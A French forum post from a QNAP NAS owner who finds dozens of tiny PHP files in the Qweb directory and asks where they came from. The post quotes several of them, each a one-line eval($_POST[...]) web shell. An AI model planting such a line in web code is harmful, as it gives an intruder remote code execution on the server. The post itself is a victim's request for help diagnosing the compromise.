Qnap fichiers zombies ?

CHAP

Padawan
7 Mars 2016
109
2
18
Loiret France
Bonjour,
Je viens de découvrir sous le répertoire Qweb une quarantaine de fichiers *.php

-rw-rw-rw- 1 admin administ 26 Sep 25 05:45 ertert.php
-rw-rw-rw- 1 admin administ 27 Sep 24 10:28 Servce.php
-rw-rw-rw- 1 admin administ 30 Sep 12 15:05 szarui.php
-rw-rw-rw- 1 admin administ 32 Sep 11 10:56 sedewe232.php
-rw-rw-rw- 1 admin administ 27 Sep 10 10:54 lasd.php
-rw-rw-rw- 1 admin administ 26 Sep 9 18:43 ccccd.php
-rw-rw-rw- 1 admin administ 31 Sep 6 08:17 xx212.php
*****************************************************************
-rw-rw-rw- 1 admin administ 30 Aug 29 01:58 ftrre22erw.php
-rw-rw-rw- 1 admin administ 27 Aug 29 00:15 Hdk23x.php
-rw-rw-rw- 1 admin administ 30 Aug 28 19:03 dfdf44dsf.php
-rw-rw-rw- 1 admin administ 26 Aug 28 13:50 cnky.php
-rw-rw-rw- 1 admin administ 26 Aug 28 10:23 sss.php
-rw-rw-rw- 1 admin administ 26 Aug 28 10:00 winee.php
-rw-rw-rw- 1 admin administ 30 Aug 28 07:21 suxuan.php
-rw-rw-rw- 1 admin administ 26 Aug 28 06:03 ertew.php
-rw-rw-rw- 1 admin administ 26 Aug 27 16:33 xx.php
-rw-rw-rw- 1 admin administ 28 Aug 27 14:19 kijd.php
-rw-rw-rw- 1 admin administ 29 Aug 27 14:05 uu.php
-rw-rw-rw- 1 admin administ 25 Aug 22 03:42 KFIUAvcac24.php
-rw-rw-rw- 1 admin administ 25 Aug 2 13:17 923ca3rfa.php
-rw-rw-rw- 1 admin administ 25 Jul 31 10:49 25js6731.php
-rw-rw-rw- 1 admin administ 25 Jul 29 15:28 21c3t.php
-rw-rw-rw- 1 admin administ 25 Jul 29 15:22 4y564e4.php


Ils contiennent une ligne de commande php avec une variable aléatoire

<?php @eval($_POST[qweqasasdassadweqw])?>
<?php @eval($_POST[y])?>
<?php @eval($_POST[cc])?>
<?php @eval($_POST[suxuan])?>

Quelle est l’origine de ces fichiers ? à quoi servent-ils ?
Créer par une applis ou déposer par un intrus ?

JC Chap